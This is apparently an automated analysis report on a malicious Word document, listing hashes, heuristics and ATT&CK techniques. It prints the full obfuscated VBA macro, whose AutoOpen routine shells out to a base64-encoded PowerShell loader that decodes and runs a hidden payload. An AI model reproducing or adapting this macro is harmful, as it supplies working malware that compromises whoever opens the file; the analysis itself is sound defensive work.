Office (OLE) malware analysis — malicious · afcf470fe4d9eaa7

MALICIOUS

Office (OLE)

109.5 KB Created: 2018-06-08 11:47:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: b57aa51eef0d9631f8e53e8e9988a525 SHA-1: ce315f2493887938f4309fbb12d6bef352c04717 SHA-256: afcf470fe4d9eaa7bd8d01cffaf98436c2a46c4047445fe7071a719d1c29d259

150 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' and the high heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicate the presence of code that can execute external commands. The Autoopen macro is present and calls a function that uses the Shell command, strongly suggesting it's designed to download and execute a secondary payload.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

Next
KhWtji = zEqPZXj + Shell(CuinjSSTfwc + Chr(pwWYOAbOHVC + vbKeyP + vZbLViJtXS) + "owers" + QJowm + ZtGESSiOtWf + mAoprfsVCz + PwMjP + wcokNEk, 88508 - 88508)
For LvkmSK = YcmkZL To SNjWO

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub Autoopen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13517 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13517 bytes
SHA-256: `ed6e7d571b60bc9d8437799222826922c35f02b35f96dcf185bc2fafecc850ba`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "vibzwiHDALn" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function KhWtji() On Error Resume Next For wztpTV = VdtoTA To YjNvno For jpfDYp = DmmwbV To 62560 FXjnv = (18964 / CBool(SrQksB) - iWJFT / Oct(23978 / Hex(20323) / lvjDS + Rnd(GpsfSB / Fix(37)))) Next pMztSt = 43695 - 77588 Next For nzurIQ = VCUMrm To HrrzLB For FZzio = KMBTn To 49696 HiJbiq = (2054 / CBool(cwomD) - rBauK / Oct(75335 / Hex(27770) / XuIUGi + Rnd(BAZRn / Fix(37)))) Next YhQQVA = 2423 - 55290 Next KhWtji = zEqPZXj + Shell(CuinjSSTfwc + Chr(pwWYOAbOHVC + vbKeyP + vZbLViJtXS) + "owers" + QJowm + ZtGESSiOtWf + mAoprfsVCz + PwMjP + wcokNEk, 88508 - 88508) For LvkmSK = YcmkZL To SNjWO For zPUQqS = KdpnN To 10482 iNkTLz = (51048 / CBool(wfCHNS) - DldmBd / Oct(92954 / Hex(52231) / vAqQv + Rnd(zXTPjF / Fix(37)))) Next QLRBVT = 80103 - 26999 Next End Function Sub Autoopen() On Error Resume Next For FCMaDJ = ESmlQY To GKjIf For nwlsZV = VAIdl To 11046 uoEVj = (80491 / CBool(PwuTNr) - KqpKK / Oct(67017 / Hex(91799) / QTAir + Rnd(EKJAK / Fix(37)))) Next QSGKY = 79914 - 66134 Next KhWtji For BqZMd = LJSSb To QoXkU For wrLml = Cjjsk To 57935 UAXEau = (78205 / CBool(Zuurq) - nvcuV / Oct(81485 / Hex(43386) / qMPFGJ + Rnd(iSYofG / Fix(37)))) Next sjzqf = 94709 - 46413 Next End Sub Attribute VB_Name = "QuutOlHzPnPdJL" Function QJowm() On Error Resume Next For NQzJu = mYcvnd To FnXkhL For FUDHaA = ljWqH To 8515 SqfWYP = (88761 / CBool(AjwSY) - lwIttT / Oct(98710 / Hex(86269) / qjuiB + Rnd(FFfZDm / Fix(37)))) Next rOIwzE = 38096 - 43168 Next njqMlEirf = "HeLL -e KA" + "BuAGUA" + "VwAtAG8AYgBqA" + "EUAYwBUA" + "CAAIABTA" + "HkAcw" + "B0A" + "GUATQAu" + "AGkA" For HbFAl = wOlwZ To pmihtM For aQtUJo = tkzVv To 48179 fbScAD = (84368 / CBool(RoGMU) - biOEs / Oct(47930 / Hex(91332) / OHwMiT + Rnd(RPBAl / Fix(37)))) Next LLFsI = 5804 - 34904 Next mCWkr = "bwAuAGMAbwBtAH" + "AAUgBFAFMAc" + "wBJAE8Abg" + "AuAGQAZQBGA" + "EwAQQBUAEUAcw" + "BUAHIAZQBhA" + "G0AK" + "AAgAFsASQBPAC4A" + "TQBlAE0ATwBS" + "AHkAUwBUAHIA" For EOwTER = iQDAv To MLfnZX For AYELis = SJLjV To 56434 KszsaB = (11669 / CBool(wwAqYw) - ZFifV / Oct(97004 / Hex(61354) / llMBn + Rnd(FTiSq / Fix(37)))) Next SfuwV = 81744 - 34817 Next CBhNRvpfE = "RQBhAG0AXQA" + "gAFsAYwBvAE4" + "AdgBFAHIAVABdAD" + "oAOgBGAFI" + "ATwBNAEIAYQBzA" + "EUA" + "NgA0AHMAV" + "ABSA" + "GkATgBnACgAI" For GKrTSR = GAqHwi To OHOASI For fWYivh = LkJfjF To 5975 ttiVpw = (35083 / CBool(KtYjRn) - VYJjbo / Oct(37681 / Hex(70143) / jpvQh + Rnd(QYfoNV / Fix(37)))) Next wSuNj = 26693 - 79350 Next mXWwcAiF = "AAnAFYAWgBC" + "AHQAVAA4AE" + "kAdwBGAEkA" + "WAAvAFMAagA4AHM" + "ARwBVAFQAcABCAE" + "EAUwBWAHgAUQ" For wcXzo = XYcma To LlADB For hdzDd = PCbqm To 26865 FvzlN = (44810 / CBool(tVtzD) - nMGKS / Oct(82996 / Hex(22328) / jMXuzw + Rnd(lfjmOh / Fix(37)))) Next NMAnj = 69945 - 23131 Next aJwdGR = "BUAGwAUgBVAGgA" + "RQBOAEMAU" + "ABoAGkANABuAHAA" + "eAB0ADEAVwA" + "2AE4AcQBsA" + "HYAVwBPAD" + "gAaABQADkAdQBCA" + "GM" For jAzbl = wRXuC To ZicrNY For IqMMpU = ztKfK To 52382 UcXuX = (25268 / CBool(oOJrLF) - ikJZHD / Oct(6479 / Hex(41498) / nKGSD + Rnd(GsjbK / Fix(37)))) Next GFwqL = 98802 - 39261 Next jbilCduqOw = "AV" + "AA0AH" + "AAYg" + "BuAHQAZ" + "QBVA" For DUiPYU = BGDXO To FjkQui For HRHkvp = fMiwE To 67217 USjrti = (88200 / CBool(ljDwG) - VMZQV / Oct(67852 / Hex(39572) / MtUizd + Rnd(XHTfFk / Fix(37)))) Next EZBvr = 3590 - 60495 Next wQOjaHrEA = "DUATw" + "A3ADMASABDAD" + "IA" + "ZQBBAGoAS" + "gBZADkARQBRAG" + "wAbABUADQ" + "AUgBJA" + "GkASgBKAH" + "IASgBoAGMAc" QJowm = njqMlEirf + mCWkr + CBhNRvpfE + mXWwcAiF + aJwdGR + jbilCduqOw + wQOjaHrEA End Function Function ZtGESSiOtWf() On Error Resume Next For hwiWJz = fizYi To mXKlP For OZjRB = EIzPZ To 84643 GlMVA = (51539 / CBool(pNbkf) - CLRBqK / Oct(52465 / Hex(71822) / BzhhF + Rnd(rJQJH / Fix(37)))) Next bTaCK = 20329 - 92398 Next uzFsrmquu = "AA4AHAAMwB3AF" + "IAYgBQADEAZgBD" + "AHIAWQB" + "HAEkAYQBOAHYAZ" + "wBI" For AwwlVO = qwYPQh To kOnSVO For DLbXZa = rzfzfK To 31911 wwMrM = (678 / CBool(rtqYm) - LPrphc / Oct(93467 / Hex(75075) / NvnBz + Rnd(tPlWYj / Fix(37)))) Next rGiBw = 85274 - 38024 Next ZrEDhid = "AFEATwB" + "ZAFUAOQB3AGs" + "ATwBnADcA" + "NgBRAG" + "8ARABnADUAWg" For jBnHjj = KziTQb To QDLBMw For FBNCvY = LfiETp To 63686 ztSPFF = (76796 / CBool(EQoIpa) - zfVEbz / Oct(50209 / Hex(9655) / LCzREP + Rnd(mBWDSi / Fix(37)))) Next tYRNJm = 12572 - 29864 Next ZbXfjtrABGZ = "AwAFUAOAB" + "TADgANAAzAGsAYw" + "BhADMAbABtADYAQ" + "QBJ" + "ADgA" For kpjYzk = vZohD To GWkpT For HTXYO = cfJlRS To 58561 HObXrz = (2746 / CBool(bddAtq) - vcUTE / Oct(14888 / Hex(53714) / RSqVF + Rnd(JIVDHv / Fix(37)))) Next uNzUAM = 84706 - 88633 Next lLJMjw = "SgBXAG" + "IAR" + "ABJAG" + "cAKwA4ADcAbA" + "BrAHAAeQA1A" + "EwAcQBSAGsATgB" + "rADEA" + "SABDAG0AMgB" + "aAGIAUgBTAE" + "cAWABlA" For OolNOJ = zaofBK To AdwzS For Iwlva = PWzDv To 69007 XDBjr = (63489 / CBool(LWdTP) - jIzqEM / Oct(49840 / Hex(49013) / RCqnNt + Rnd(AWsvin / Fix(37)))) Next wuESR = 16792 - 72117 Next DJXoTwLjj = "GEASAB6AFgAYQB2" + "AFkAdgBVAEMANgB" + "ZAEIASQB4A" + "EI" + "ASgA0AFYAUgBr" For SfkRH = IwiJt To lztETG For WGaUGw = wwAuH To 32227 wkLCw = (73944 / CBool(rYKlp) - PzAzz / Oct(21981 / Hex(45415) / MrKdU + Rnd(aMwoC / Fix(37)))) Next jnOhCW = 38638 - 68212 Next dULCwDuL = "AHQAcgBa" + "AG0AOABiAHQ" + "AMwB" + "nAEEA" + "bQA2AFIAOQBq" + "ADM" + "AWgBrA" + "HEASgBGAEoAW" + "QBGAEYAN" For iQjRtr = vAuwtl To tAYcma For ZWjNSb = Szdroj To 58536 bMbIcR = (96004 / CBool(FjwCUh) - thIAIu / Oct(99236 / Hex(7784) / PNcCRF + Rnd(BGTYM / Fix(37)))) Next dwMbc = 57612 - 57124 Next LvRVZRZtj = "wA3ADYAWA" + "A0AE0A" + "egAvAFAA" + "cABEAGIAOABBAFc" + "AeQBhADQ" + "AVgBDAFkASgBqA" + "HcAaw" For ZQlUj = fiVfc To AsPpv For AiwvBI = sEKoh To 34483 aFqwq = (67078 / CBool(vZSlnw) - AkiXj / Oct(1011 / Hex(57003) / YiOcCq + Rnd(UuoOG / Fix(37)))) Next uCSwMu = 8875 - 9251 Next WMEXBqZ = "BpAEY" + "ASwBOADUAY" + "QA4ADQAOABsAH" + "cAYQA" + "1ADQARgBoAH" + "gAdQA" + "yADcAVgBkA" + "DEAUQA4ADQAcw" For JOLOsT = QARsbj To iNjrq For YwZqV = iQYUG To 48134 vUzRow = (72490 / CBool(iowOHO) - jlfCOA / Oct(9594 / Hex(25457) / VsmlLs + Rnd(KSjlsi / Fix(37)))) Next rtELuI = 54714 - 53676 Next jHqwKmvSj = "B1AHAALwBiAG" + "wAegA3AE0" + "ARgB" + "HAGIAYgBCAF" + "MAdgB5AGE" + "AMw" + "BEADgAMQ" + "BHA" + "HYAVwBVAE" + "IAawArAH" For rsjno = KuqGK To vLAhlI For vadwBo = JJoKEN To 87673 vtiEqG = (15496 / CBool(ulYAwi) - dIzqj / Oct(75829 / Hex(27633) / fzBuBG + Rnd(CwCQPH / Fix(37)))) Next hRino = 66660 - 25387 Next LtBdmPGzO = "IAWAA4" + "AGsAYwBIAHUAZQ" + "A3AFkAMQBYAE" + "4AeQBSAGQAe" + "ABQADEA" ZtGESSiOtWf = uzFsrmquu + ZrEDhid + ZbXfjtrABGZ + lLJMjw + DJXoTwLjj + dULCwDuL + LvRVZRZtj + WMEXBqZ + jHqwKmvSj + LtBdmPGzO End Function Function mAoprfsVCz() On Error Resume Next For nrbFKC = WNrhz To FpLGjO For bwfSwa = iLtwfj To 5018 JTwvd = (95047 / CBool(oZiIDc) - SjIUiA / Oct(78193 / Hex(22739) / IkbWK + Rnd(sBSwt / Fix(37)))) Next rJkllB = 19159 - 12183 Next ibGmwQ = "NQA" + "2A" + "C8AWABu" + "AHUAbgBzAEEAS" + "ABYA" + "GoANQBV" + "AEcARgB" For oWwGsM = LCBWzK To KBaPUj For pGivaX = isziF To 49822 NdPRH = (3561 / CBool(QvWihV) - kKlpZ / Oct(2725 / Hex(97671) / QLRoT + Rnd(JCsslU / Fix(37)))) Next XKzMfr = 49070 - 22689 Next rALWY = "xAFUAV" + "gBaA" + "HgAZgBzAGQAaw" + "BQA" For MtBzw = NpjYUw To EzSiM For siqwA = MzncuJ To 48608 EwXnV = (59002 / CBool(oCMMzw) - Gwtwf / Oct(35759 / Hex(37025) / WzBUlj + Rnd(NlPvu / Fix(37)))) Next GbfNi = 61792 - 6887 Next ESrUqJVvPZ = "EMASgBUAGsA" + "WABVAD" + "kAMgBqADMAdQA" + "1AFAAZABkAEs" For ijAiBt = iwiGkY To amAsrP For azEEDz = OizmP To 9614 OAqkpk = (60154 / CBool(koJjfB) - MpoomD / Oct(73063 / Hex(93195) / wuTTP + Rnd(UVTjLl / Fix(37)))) Next ICiJn = 24310 - 29570 Next FihrwLJ = "AKw" + "BLAH" + "EA" + "VgBRAGI" + "ARABIAGs" For TUUUWI = bSocDR To vQLYDU For QvqHCj = JcQZhd To 59929 wzsYW = (87984 / CBool(ujhsW) - OwPIu / Oct(13317 / Hex(4380) / iMUbL + Rnd(pYDWn / Fix(37)))) Next VSLfi = 97220 - 89778 Next pFtwofJURsL = "AQQB" + "zADQAbwBuAGEAa" + "wBBAE4AWgB" + "kAEo" + "AcABYA" + "HAA" For BGaJK = viAQmW To BUnYzK For LVjKFP = vmjdwM To 73339 XmLQj = (43084 / CBool(XmkQd) - zYHho / Oct(36069 / Hex(9126) / aPDuvz + Rnd(RmqKqd / Fix(37)))) Next AMjiFA = 96322 - 87694 Next poRlriq = "TgBU" + "AG8AbABWAFAAMAB" + "DAG0AcwB" + "mAGE" + "AdQBWAFEAVABHAG" + "4ARgAvADk" For olPzOc = HthrwX To WkWTG For uFnrBY = AJNEhh To 78282 JfBdo = (80718 / CBool(RJmAdE) - tijrt / Oct(62325 / Hex(67105) / Ywqhwz + Rnd(cKPitM / Fix(37)))) Next UqRJL = 78321 - 57471 Next mSifZsARDU = "AMABDAGEA" + "cwAv" + "AEUAUABFAE0" + "ARQBy" + "ADMAcA" + "BlAFkASQ" + "B0AFYAVA" + "BaADUAcA" + "AwAHYAT" mAoprfsVCz = ibGmwQ + rALWY + ESrUqJVvPZ + FihrwLJ + pFtwofJURsL + poRlriq + mSifZsARDU End Function Function PwMjP() On Error Resume Next For BuppQ = XpnIfK To FnGtk For jbkvLz = NqZjUu To 39264 vvrGh = (3480 / CBool(UcaNC) - PDLQbD / Oct(95107 / Hex(56374) / wiscQ + Rnd(QDnlqm / Fix(37)))) Next rOnCj = 52652 - 13883 Next FkYMBK = "wB0AG" + "gA" + "RQBrAEMATwAzAG" + "QAVQAyA" For Vwvow = OTtqWq To wNOElX For YmbLM = LwcYU To 42462 Idfwn = (35059 / CBool(BjuvTw) - uBZzzD / Oct(5805 / Hex(69235) / WkcsbR + Rnd(UVAUWT / Fix(37)))) Next RRTcCo = 84631 - 61730 Next SHziDKWB = "HMAZwBTA" + "FgA" + "ZwBIAH" + "cANwBmACcAIA" + "ApACwAW" + "wBT" + "AFkAUwB0AGUATQ" + "AuAEkA" + "TwAuA" + "GMAbw" For PaRvDa = STYuJ To KZTjs For ZSbIb = IjibA To 90869 qsMSKW = (76208 / CBool(wiBwYY) - GtJSw / Oct(35483 / Hex(12456) / oRpbv + Rnd(rqScDS / Fix(37)))) Next wGINF = 60114 - 51241 Next stRpRZrE = "BtAFA" + "AcgBlAHM" + "AUwBp" + "AE8ATgAuA" + "EM" + "AbwB" + "tAHAAUg" For aKCvDa = RizYkS To BUvsA For riVVG = InAFqn To 61215 NGnjrT = (12717 / CBool(kdfhB) - EoRMi / Oct(37550 / Hex(84590) / phoTRw + Rnd(dIlEd / Fix(37)))) Next vhPAj = 987 - 35572 Next lzLlBuRd = "BFAHMAUwBpAE8" + "Ab" + "gBNAG8AZABFAF" + "0AOgA6AGQA" PwMjP = FkYMBK + SHziDKWB + stRpRZrE + lzLlBuRd End Function Function wcokNEk() On Error Resume Next For rqYiji = niIMz To QGrYC For IHVtd = OJGCM To 96478 ZszrQ = (70152 / CBool(PDpics) - pibXbi / Oct(84707 / Hex(18508) / WwvKUZ + Rnd(kRKtX / Fix(37)))) Next TPboTs = 9965 - 33606 Next cLUWLS = "RQB" + "DAG8" + "ATQ" + "BwAFIAZQB" For QlrZif = kTaPBb To VZNqzE For SwILL = wnKzE To 50501 fKTvua = (10821 / CBool(qSIcsU) - OFBHM / Oct(58726 / Hex(95966) / jNTTiz + Rnd(bLawO / Fix(37)))) Next GSwXz = 60989 - 54279 Next TpTBqWAT = "TAHMAKQB8AEY" + "ATwBSAGUAQQB" + "jAEgALQBPA" + "EIAagBlAEMAVAAg" + "AH" + "sAbgBlAFcALQBvA" + "GIAagBFAGMAVA" + "AgAHMAeQBTA" For AjTrqY = zwNAh To jiaGX For hqwBwF = HnFjNw To 41693 idAbr = (47378 / CBool(iONvj) - WjWQcw / Oct(89003 / Hex(80527) / iXlvQ + Rnd(sNABM / Fix(37)))) Next AEZif = 20764 - 58439 Next jzfaPEjb = "HQARQBtAC4Aa" + "QBPAC4AcwBUAH" + "IA" + "ZQBhAG0AUgBFAG" + "EARAB" + "lA" For ioAYI = DjTlCb To fvdqw For mlBMt = TWfwm To 93163 PdVtWN = (75247 / CBool(NItPzk) - VIwoj / Oct(5697 / Hex(84830) / jbHEoP + Rnd(mhoRL / Fix(37)))) Next JBHcIc = 47776 - 56101 Next CtMzZdpZjLX = "FIA" + "KAA" + "gACQ" + "AXwAsA" + "CAAWwBUAGUAeABU" For zujQA = AzMiX To oRPIw For pVMai = QLGoL To 51262 TzZiNU = (45613 / CBool(Bmjbi) - jUjsUK / Oct(22599 / Hex(68427) / vWLKA + Rnd(QLlmHE / Fix(37)))) Next PnCoa = 3435 - 77272 Next JnurER = "AC4AZQBO" + "AEMAbwBkAGkAT" + "gBn" + "AF0AOgA6AEEAcw" For cwzlhr = wrQOj To iIBJXa For bwpaji = wqfjJ To 91155 SXMYT = (94491 / CBool(OtVsUO) - fAiDbD / Oct(14476 / Hex(58056) / ZCCma + Rnd(MjFoR / Fix(37)))) Next kpkEd = 82592 - 24558 Next fcjtGGlGh = "BjAEkAS" + "QAgAC" + "kAIAB9ACAAKQAuA" + "HIARQBB" + "AE" + "QAd" + "ABPAEUAbgBkAC" For ThOPS = pBjir To oOnWQ For TIhon = zauLtw To 97095 uZpro = (74495 / CBool(IRLAW) - AXVCOo / Oct(35526 / Hex(44868) / WiuhS + Rnd(WdHhjf / Fix(37)))) Next OZvid = 82832 - 21031 Next ZorwWdsZQL = "gAIAApA" + "CAAfAAgAC4AKAAg" + "ACQA" + "RQBO" + "AHYAOgBjAE" + "8ATQBTA" + "FAARQ" + "BjAFsAN" + "AAsA" For WoRkwC = JfKjp To CKwGUa For nDSmRi = wGfKb To 23844 AqdzW = (80866 / CBool(UcXDqf) - OzcJQ / Oct(47680 / Hex(7609) / ViTRu + Rnd(CzAEcc / Fix(37)))) Next UTIwk = 78162 - 35695 Next GRmkIXV = "DEANQ" + "AsADIAN" + "QBdAC0ASgBvA" + "EkATgAnA" + "CcAKQA=" wcokNEk = cLUWLS + TpTBqWAT + jzfaPEjb + CtMzZdpZjLX + JnurER + fcjtGGlGh + ZorwWdsZQL + GRmkIXV End Function

SHA-256: ed6e7d571b60bc9d8437799222826922c35f02b35f96dcf185bc2fafecc850ba

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "vibzwiHDALn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function KhWtji()
On Error Resume Next
For wztpTV = VdtoTA To YjNvno
      For jpfDYp = DmmwbV To 62560
         FXjnv = (18964 / CBool(SrQksB) - iWJFT / Oct(23978 / Hex(20323) / lvjDS + Rnd(GpsfSB / Fix(37))))
Next
   pMztSt = 43695 - 77588
Next
For nzurIQ = VCUMrm To HrrzLB
      For FZzio = KMBTn To 49696
         HiJbiq = (2054 / CBool(cwomD) - rBauK / Oct(75335 / Hex(27770) / XuIUGi + Rnd(BAZRn / Fix(37))))
Next
   YhQQVA = 2423 - 55290
Next
KhWtji = zEqPZXj + Shell(CuinjSSTfwc + Chr(pwWYOAbOHVC + vbKeyP + vZbLViJtXS) + "owers" + QJowm + ZtGESSiOtWf + mAoprfsVCz + PwMjP + wcokNEk, 88508 - 88508)
For LvkmSK = YcmkZL To SNjWO
      For zPUQqS = KdpnN To 10482
         iNkTLz = (51048 / CBool(wfCHNS) - DldmBd / Oct(92954 / Hex(52231) / vAqQv + Rnd(zXTPjF / Fix(37))))
Next
   QLRBVT = 80103 - 26999
Next
End Function
Sub Autoopen()
On Error Resume Next
For FCMaDJ = ESmlQY To GKjIf
      For nwlsZV = VAIdl To 11046
         uoEVj = (80491 / CBool(PwuTNr) - KqpKK / Oct(67017 / Hex(91799) / QTAir + Rnd(EKJAK / Fix(37))))
Next
   QSGKY = 79914 - 66134
Next
KhWtji
For BqZMd = LJSSb To QoXkU
      For wrLml = Cjjsk To 57935
         UAXEau = (78205 / CBool(Zuurq) - nvcuV / Oct(81485 / Hex(43386) / qMPFGJ + Rnd(iSYofG / Fix(37))))
Next
   sjzqf = 94709 - 46413
Next
End Sub


Attribute VB_Name = "QuutOlHzPnPdJL"
Function QJowm()
On Error Resume Next
For NQzJu = mYcvnd To FnXkhL
      For FUDHaA = ljWqH To 8515
         SqfWYP = (88761 / CBool(AjwSY) - lwIttT / Oct(98710 / Hex(86269) / qjuiB + Rnd(FFfZDm / Fix(37))))
Next
   rOIwzE = 38096 - 43168
Next
njqMlEirf = "HeLL -e KA" + "BuAGUA" + "VwAtAG8AYgBqA" + "EUAYwBUA" + "CAAIABTA" + "HkAcw" + "B0A" + "GUATQAu" + "AGkA"
For HbFAl = wOlwZ To pmihtM
      For aQtUJo = tkzVv To 48179
         fbScAD = (84368 / CBool(RoGMU) - biOEs / Oct(47930 / Hex(91332) / OHwMiT + Rnd(RPBAl / Fix(37))))
Next
   LLFsI = 5804 - 34904
Next
mCWkr = "bwAuAGMAbwBtAH" + "AAUgBFAFMAc" + "wBJAE8Abg" + "AuAGQAZQBGA" + "EwAQQBUAEUAcw" + "BUAHIAZQBhA" + "G0AK" + "AAgAFsASQBPAC4A" + "TQBlAE0ATwBS" + "AHkAUwBUAHIA"
For EOwTER = iQDAv To MLfnZX
      For AYELis = SJLjV To 56434
         KszsaB = (11669 / CBool(wwAqYw) - ZFifV / Oct(97004 / Hex(61354) / llMBn + Rnd(FTiSq / Fix(37))))
Next
   SfuwV = 81744 - 34817
Next
CBhNRvpfE = "RQBhAG0AXQA" + "gAFsAYwBvAE4" + "AdgBFAHIAVABdAD" + "oAOgBGAFI" + "ATwBNAEIAYQBzA" + "EUA" + "NgA0AHMAV" + "ABSA" + "GkATgBnACgAI"
For GKrTSR = GAqHwi To OHOASI
      For fWYivh = LkJfjF To 5975
         ttiVpw = (35083 / CBool(KtYjRn) - VYJjbo / Oct(37681 / Hex(70143) / jpvQh + Rnd(QYfoNV / Fix(37))))
Next
   wSuNj = 26693 - 79350
Next
mXWwcAiF = "AAnAFYAWgBC" + "AHQAVAA4AE" + "kAdwBGAEkA" + "WAAvAFMAagA4AHM" + "ARwBVAFQAcABCAE" + "EAUwBWAHgAUQ"
For wcXzo = XYcma To LlADB
      For hdzDd = PCbqm To 26865
         FvzlN = (44810 / CBool(tVtzD) - nMGKS / Oct(82996 / Hex(22328) / jMXuzw + Rnd(lfjmOh / Fix(37))))
Next
   NMAnj = 69945 - 23131
Next
aJwdGR = "BUAGwAUgBVAGgA" + "RQBOAEMAU" + "ABoAGkANABuAHAA" + "eAB0ADEAVwA" + "2AE4AcQBsA" + "HYAVwBPAD" + "gAaABQADkAdQBCA" + "GM"
For jAzbl = wRXuC To ZicrNY
      For IqMMpU = ztKfK To 52382
         UcXuX = (25268 / CBool(oOJrLF) - ikJZHD / Oct(6479 / Hex(41498) / nKGSD + Rnd(GsjbK / Fix(37))))
Next
   GFwqL = 98802 - 39261
Next
jbilCduqOw = "AV" + "AA0AH" + "AAYg" + "BuAHQAZ" + "QBVA"
For DUiPYU = BGDXO To FjkQui
      For HRHkvp = fMiwE To 67217
         USjrti = (88200 / CBool(ljDwG) - VMZQV / Oct(67852 / Hex(39572) / MtUizd + Rnd(XHTfFk / Fix(37))))
Next
   EZBvr = 3590 - 60495
Next
wQOjaHrEA = "DUATw" + "A3ADMASABDAD" + "IA" + "ZQBBAGoAS" + "gBZADkARQBRAG" + "wAbABUADQ" + "AUgBJA" + "GkASgBKAH" + "IASgBoAGMAc"
QJowm = njqMlEirf + mCWkr + CBhNRvpfE + mXWwcAiF + aJwdGR + jbilCduqOw + wQOjaHrEA
End Function
Function ZtGESSiOtWf()
On Error Resume Next
For hwiWJz = fizYi To mXKlP
      For OZjRB = EIzPZ To 84643
         GlMVA = (51539 / CBool(pNbkf) - CLRBqK / Oct(52465 / Hex(71822) / BzhhF + Rnd(rJQJH / Fix(37))))
Next
   bTaCK = 20329 - 92398
Next
uzFsrmquu = "AA4AHAAMwB3AF" + "IAYgBQADEAZgBD" + "AHIAWQB" + "HAEkAYQBOAHYAZ" + "wBI"
For AwwlVO = qwYPQh To kOnSVO
      For DLbXZa = rzfzfK To 31911
         wwMrM = (678 / CBool(rtqYm) - LPrphc / Oct(93467 / Hex(75075) / NvnBz + Rnd(tPlWYj / Fix(37))))
Next
   rGiBw = 85274 - 38024
Next
ZrEDhid = "AFEATwB" + "ZAFUAOQB3AGs" + "ATwBnADcA" + "NgBRAG" + "8ARABnADUAWg"
For jBnHjj = KziTQb To QDLBMw
      For FBNCvY = LfiETp To 63686
         ztSPFF = (76796 / CBool(EQoIpa) - zfVEbz / Oct(50209 / Hex(9655) / LCzREP + Rnd(mBWDSi / Fix(37))))
Next
   tYRNJm = 12572 - 29864
Next
ZbXfjtrABGZ = "AwAFUAOAB" + "TADgANAAzAGsAYw" + "BhADMAbABtADYAQ" + "QBJ" + "ADgA"
For kpjYzk = vZohD To GWkpT
      For HTXYO = cfJlRS To 58561
         HObXrz = (2746 / CBool(bddAtq) - vcUTE / Oct(14888 / Hex(53714) / RSqVF + Rnd(JIVDHv / Fix(37))))
Next
   uNzUAM = 84706 - 88633
Next
lLJMjw = "SgBXAG" + "IAR" + "ABJAG" + "cAKwA4ADcAbA" + "BrAHAAeQA1A" + "EwAcQBSAGsATgB" + "rADEA" + "SABDAG0AMgB" + "aAGIAUgBTAE" + "cAWABlA"
For OolNOJ = zaofBK To AdwzS
      For Iwlva = PWzDv To 69007
         XDBjr = (63489 / CBool(LWdTP) - jIzqEM / Oct(49840 / Hex(49013) / RCqnNt + Rnd(AWsvin / Fix(37))))
Next
   wuESR = 16792 - 72117
Next
DJXoTwLjj = "GEASAB6AFgAYQB2" + "AFkAdgBVAEMANgB" + "ZAEIASQB4A" + "EI" + "ASgA0AFYAUgBr"
For SfkRH = IwiJt To lztETG
      For WGaUGw = wwAuH To 32227
         wkLCw = (73944 / CBool(rYKlp) - PzAzz / Oct(21981 / Hex(45415) / MrKdU + Rnd(aMwoC / Fix(37))))
Next
   jnOhCW = 38638 - 68212
Next
dULCwDuL = "AHQAcgBa" + "AG0AOABiAHQ" + "AMwB" + "nAEEA" + "bQA2AFIAOQBq" + "ADM" + "AWgBrA" + "HEASgBGAEoAW" + "QBGAEYAN"
For iQjRtr = vAuwtl To tAYcma
      For ZWjNSb = Szdroj To 58536
         bMbIcR = (96004 / CBool(FjwCUh) - thIAIu / Oct(99236 / Hex(7784) / PNcCRF + Rnd(BGTYM / Fix(37))))
Next
   dwMbc = 57612 - 57124
Next
LvRVZRZtj = "wA3ADYAWA" + "A0AE0A" + "egAvAFAA" + "cABEAGIAOABBAFc" + "AeQBhADQ" + "AVgBDAFkASgBqA" + "HcAaw"
For ZQlUj = fiVfc To AsPpv
      For AiwvBI = sEKoh To 34483
         aFqwq = (67078 / CBool(vZSlnw) - AkiXj / Oct(1011 / Hex(57003) / YiOcCq + Rnd(UuoOG / Fix(37))))
Next
   uCSwMu = 8875 - 9251
Next
WMEXBqZ = "BpAEY" + "ASwBOADUAY" + "QA4ADQAOABsAH" + "cAYQA" + "1ADQARgBoAH" + "gAdQA" + "yADcAVgBkA" + "DEAUQA4ADQAcw"
For JOLOsT = QARsbj To iNjrq
      For YwZqV = iQYUG To 48134
         vUzRow = (72490 / CBool(iowOHO) - jlfCOA / Oct(9594 / Hex(25457) / VsmlLs + Rnd(KSjlsi / Fix(37))))
Next
   rtELuI = 54714 - 53676
Next
